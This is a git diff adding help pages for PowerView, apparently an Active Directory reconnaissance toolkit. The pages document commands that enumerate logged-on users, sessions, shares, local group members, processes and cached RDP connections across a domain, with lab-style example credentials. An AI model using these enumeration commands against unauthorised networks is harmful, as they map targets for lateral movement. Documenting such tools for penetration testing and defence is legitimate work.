+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local

+```

+

+Returns the site for WINDOWS1.testlab.local.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainComputer | Get-NetComputerSiteName

+```

+

+Returns the sites for every machine in AD.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to check the site for (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ComputerSite

+

+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md
new file mode 100755
index 0000000..29ac4d6
--- /dev/null
+++ b/docs/Recon/Get-NetLocalGroup.md
@@ -0,0 +1,132 @@
+# Get-NetLocalGroup

+

+## SYNOPSIS

+Enumerates the local groups on the local (or remote) machine.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+```

+Get-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will enumerate the names and descriptions for the

+local groups on the current, or remote, machine.

+By default, the Win32 API

+call NetLocalGroupEnum will be used (for speed).

+Specifying "-Method WinNT"

+causes the WinNT service provider to be used instead, which returns group

+SIDs along with the group names and descriptions/comments.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetLocalGroup

+```

+

+ComputerName                  GroupName                     Comment

+------------                  ---------                     -------

+WINDOWS1                      Administrators                Administrators have comple...

+WINDOWS1                      Backup Operators              Backup Operators can overr...

+WINDOWS1                      Cryptographic Operators       Members are authorized to ...

+...

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetLocalGroup -Method Winnt

+```

+

+ComputerName           GroupName              GroupSID              Comment

+------------           ---------              --------              -------

+WINDOWS1               Administrators         S-1-5-32-544          Administrators hav...

+WINDOWS1               Backup Operators       S-1-5-32-551          Backup Operators c...

+WINDOWS1               Cryptographic Opera...

+S-1-5-32-569          Members are author...

+...

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-NetLocalGroup -ComputerName primary.testlab.local

+```

+

+ComputerName                  GroupName                     Comment

+------------                  ---------                     -------

+primary.testlab.local         Administrators                Administrators have comple...

+primary.testlab.local         Users                         Users are prevented from m...

+primary.testlab.local         Guests                        Guests have the same acces...

+primary.testlab.local         Print Operators               Members can administer dom...

+primary.testlab.local         Backup Operators              Backup Operators can overr...

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for sessions (also accepts IP addresses).

+Defaults to the localhost.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: $Env:COMPUTERNAME

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Method

+The collection method to use, defaults to 'API', also accepts 'WinNT'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: CollectionMethod

+

+Required: False

+Position: Named

+Default value: API

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to a remote machine.

+Only applicable with "-Method WinNT".

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LocalGroup.API

+

+Custom PSObject with translated group property fields from API results.

+

+PowerView.LocalGroup.WinNT

+

+Custom PSObject with translated group property fields from WinNT results.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx)

+

diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md
new file mode 100755
index 0000000..302302b
--- /dev/null
+++ b/docs/Recon/Get-NetLocalGroupMember.md
@@ -0,0 +1,212 @@
+# Get-NetLocalGroupMember

+

+## SYNOPSIS

+Enumerates members of a specific local group on the local (or remote) machine.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Convert-ADName

+

+## SYNTAX

+

+```

+Get-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]

+ [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will enumerate the members of a specified local group  on the

+current, or remote, machine.

+By default, the Win32 API call NetLocalGroupGetMembers

+will be used (for speed).

+Specifying "-Method WinNT" causes the WinNT service provider

+to be used instead, which returns a larger amount of information.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetLocalGroupMember | ft

+```

+

+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain

+------------   ---------      ----------     ---                   -------       --------

+WINDOWS1       Administrators WINDOWS1\Ad...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators WINDOWS1\lo...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators TESTLAB\Dom...

+S-1-5-21-89... 

+True           True

+WINDOWS1       Administrators TESTLAB\har...

+S-1-5-21-89... 

+False           True

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetLocalGroupMember -Method winnt | ft

+```

+

+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain

+------------   ---------      ----------     ---                   -------       --------

+WINDOWS1       Administrators WINDOWS1\Ad...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators WINDOWS1\lo...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators TESTLAB\Dom...

+S-1-5-21-89... 

+True           True

+WINDOWS1       Administrators TESTLAB\har...

+S-1-5-21-89... 

+False           True

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-NetLocalGroup | Get-NetLocalGroupMember | ft

+```

+

+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain

+------------   ---------      ----------     ---                   -------       --------

+WINDOWS1       Administrators WINDOWS1\Ad...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators WINDOWS1\lo...

+S-1-5-21-25... 

+False          False

+WINDOWS1       Administrators TESTLAB\Dom...

+S-1-5-21-89... 

+True           True

+WINDOWS1       Administrators TESTLAB\har...

+S-1-5-21-89... 

+False           True

+WINDOWS1       Guests         WINDOWS1\Guest S-1-5-21-25... 

+False          False

+WINDOWS1       IIS_IUSRS      NT AUTHORIT...

+S-1-5-17                False          False

+WINDOWS1       Users          NT AUTHORIT...

+S-1-5-4                 False          False

+WINDOWS1       Users          NT AUTHORIT...

+S-1-5-11                False          False

+WINDOWS1       Users          WINDOWS1\lo...

+S-1-5-21-25... 

+False        UNKNOWN

+WINDOWS1       Users          TESTLAB\Dom...

+S-1-5-21-89... 

+True        UNKNOWN

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft

+```

+

+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain

+------------   ---------      ----------     ---                   -------       --------

+primary.tes...

+Administrators TESTLAB\Adm...

+S-1-5-21-89... 

+False          False

+primary.tes...

+Administrators TESTLAB\loc...

+S-1-5-21-89... 

+False          False

+primary.tes...

+Administrators TESTLAB\Ent...

+S-1-5-21-89... 

+True          False

+primary.tes...

+Administrators TESTLAB\Dom...

+S-1-5-21-89... 

+True          False

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for sessions (also accepts IP addresses).

+Defaults to the localhost.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: $Env:COMPUTERNAME

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -GroupName

+The local group name to query for users.

+If not given, it defaults to "Administrators".

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: True (ByPropertyName)

+Accept wildcard characters: False

+```

+

+### -Method

+The collection method to use, defaults to 'API', also accepts 'WinNT'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: CollectionMethod

+

+Required: False

+Position: Named

+Default value: API

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to a remote machine.

+Only applicable with "-Method WinNT".

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LocalGroupMember.API

+

+Custom PSObject with translated group property fields from API results.

+

+PowerView.LocalGroupMember.WinNT

+

+Custom PSObject with translated group property fields from WinNT results.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together

+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx

+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together

+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx

+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx)

+

diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md
new file mode 100755
index 0000000..024d1b2
--- /dev/null
+++ b/docs/Recon/Get-NetLoggedon.md
@@ -0,0 +1,100 @@
+# Get-NetLoggedon

+

+## SYNOPSIS

+Returns users logged on the local (or a remote) machine.

+Note: administrative rights needed for newer Windows OSes.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Get-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will execute the NetWkstaUserEnum Win32API call to query

+a given host for actively logged on users.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetLoggedon

+```

+

+Returns users actively logged onto the local host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetLoggedon -ComputerName sqlserver

+```

+

+Returns users actively logged onto the 'sqlserver' host.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer | Get-NetLoggedon

+```

+

+Returns all logged on users for all computers in the domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for logged on users (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LoggedOnUserInfo

+

+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including

+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)

+

diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md
new file mode 100755
index 0000000..ff18322
--- /dev/null
+++ b/docs/Recon/Get-NetRDPSession.md
@@ -0,0 +1,104 @@
+# Get-NetRDPSession

+

+## SYNOPSIS

+Returns remote desktop/session information for the local (or a remote) machine.

+

+Note: only members of the Administrators or Account Operators local group

+can successfully execute this functionality on a remote target.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Get-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation

+Win32API calls to query a given RDP remote service for active sessions and originating

+IPs.

+This is a replacement for qwinsta.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetRDPSession

+```

+

+Returns active RDP/terminal sessions on the local host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetRDPSession -ComputerName "sqlserver"

+```

+

+Returns active RDP/terminal sessions on the 'sqlserver' host.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainController | Get-NetRDPSession

+```

+

+Returns active RDP/terminal sessions on all domain controllers.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for active sessions (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.RDPSessionInfo

+

+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,

+with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx)

+

diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md
new file mode 100755
index 0000000..d9e2f50
--- /dev/null
+++ b/docs/Recon/Get-NetSession.md
@@ -0,0 +1,99 @@
+# Get-NetSession

+

+## SYNOPSIS

+Returns session information for the local (or a remote) machine.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Get-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will execute the NetSessionEnum Win32API call to query

+a given host for active sessions.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetSession

+```

+

+Returns active sessions on the local host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetSession -ComputerName sqlserver

+```

+

+Returns active sessions on the 'sqlserver' host.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainController | Get-NetSession

+```

+

+Returns active sessions on all domain controllers.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-NetSession -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for sessions (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.SessionInfo

+

+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including

+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)

+

diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md
new file mode 100755
index 0000000..b3f2abe
--- /dev/null
+++ b/docs/Recon/Get-NetShare.md
@@ -0,0 +1,100 @@
+# Get-NetShare

+

+## SYNOPSIS

+Returns open shares on the local (or a remote) machine.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Get-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will execute the NetShareEnum Win32API call to query

+a given host for open shares.

+This is a replacement for "net share \\\\hostname".

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-NetShare

+```

+

+Returns active shares on the local host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-NetShare -ComputerName sqlserver

+```

+

+Returns active shares on the 'sqlserver' host

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer | Get-NetShare

+```

+

+Returns all shares for all computers in the domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-NetShare -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for shares (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ShareInfo

+

+A PSCustomObject representing a SHARE_INFO_1 structure, including

+the name/type/remark for each share, with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)

+

diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md
new file mode 100755
index 0000000..448212f
--- /dev/null
+++ b/docs/Recon/Get-PathAcl.md
@@ -0,0 +1,94 @@
+# Get-PathAcl

+

+## SYNOPSIS

+Enumerates the ACL for a given file path.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+Enumerates the ACL for a specified file/folder path, and translates

+the access rules for each entry into readable formats.

+If -Credential is passed,

+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-PathAcl "\\SERVER\Share\"

+```

+

+Returns ACLs for the given UNC share.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+gci .\test.txt | Get-PathAcl

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)

+Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred

+

+## PARAMETERS

+

+### -Path

+Specifies the local or remote path to enumerate the ACLs for.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: FullName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target path.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+One of more paths to enumerate ACLs for.

+

+## OUTPUTS

+

+### PowerView.FileACL

+

+A custom object with the full path and associated ACL entries.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)

+

diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md
new file mode 100755
index 0000000..2fd6e09
--- /dev/null
+++ b/docs/Recon/Get-RegLoggedOn.md
@@ -0,0 +1,89 @@
+# Get-RegLoggedOn

+

+## SYNOPSIS

+Returns who is logged onto the local (or a remote) machine

+through enumeration of remote registry keys.

+

+Note: This function requires only domain user rights on the

+machine you're enumerating, but remote registry must be enabled.

+

+Author: Matt Kelly (@BreakersAll)  

+License: BSD 3-Clause  

+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-RegLoggedOn [[-ComputerName] <String[]>]

+```

+

+## DESCRIPTION

+This function will query the HKU registry values to retrieve the local

+logged on users SID and then attempt and reverse it.

+Adapted technique from Sysinternal's PSLoggedOn script.

+Benefit over

+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges

+required (NetWkstaUserEnum requires remote admin access).

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-RegLoggedOn

+```

+

+Returns users actively logged onto the local host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-RegLoggedOn -ComputerName sqlserver

+```

+

+Returns users actively logged onto the 'sqlserver' host.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainController | Get-RegLoggedOn

+```

+

+Returns users actively logged on all domain controllers.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for remote registry values (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.RegLoggedOnUser

+

+A PSCustomObject including the UserDomain/UserName/UserSID of each

+actively logged on user, with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md
new file mode 100755
index 0000000..481dbb6
--- /dev/null
+++ b/docs/Recon/Get-WMIProcess.md
@@ -0,0 +1,80 @@
+# Get-WMIProcess

+

+## SYNOPSIS

+Returns a list of processes and their owners on the local or remote machine.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,

+including the owners of the particular process.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-WMIProcess -ComputerName WINDOWS1

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.UserProcess

+

+A PSCustomObject containing the remote process information.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md
new file mode 100755
index 0000000..fe60228
--- /dev/null
+++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md
@@ -0,0 +1,99 @@
+# Get-WMIRegCachedRDPConnection

+

+## SYNOPSIS

+Returns information about RDP connections outgoing from the local (or remote) machine.

+

+Note: This function requires administrative rights on the machine you're enumerating.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses remote registry functionality to query all entries for the

+"Windows Remote Desktop Connection Client" on a machine, separated by

+user and target server.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-WMIRegCachedRDPConnection

+```

+

+Returns the RDP connection client information for the local machine.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-WMIRegCachedRDPConnection  -ComputerName WINDOWS2.testlab.local

+```

+

+Returns the RDP connection client information for the WINDOWS2.testlab.local machine

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer | Get-WMIRegCachedRDPConnection

+```

+

+Returns cached RDP information for all machines in the domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connecting to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

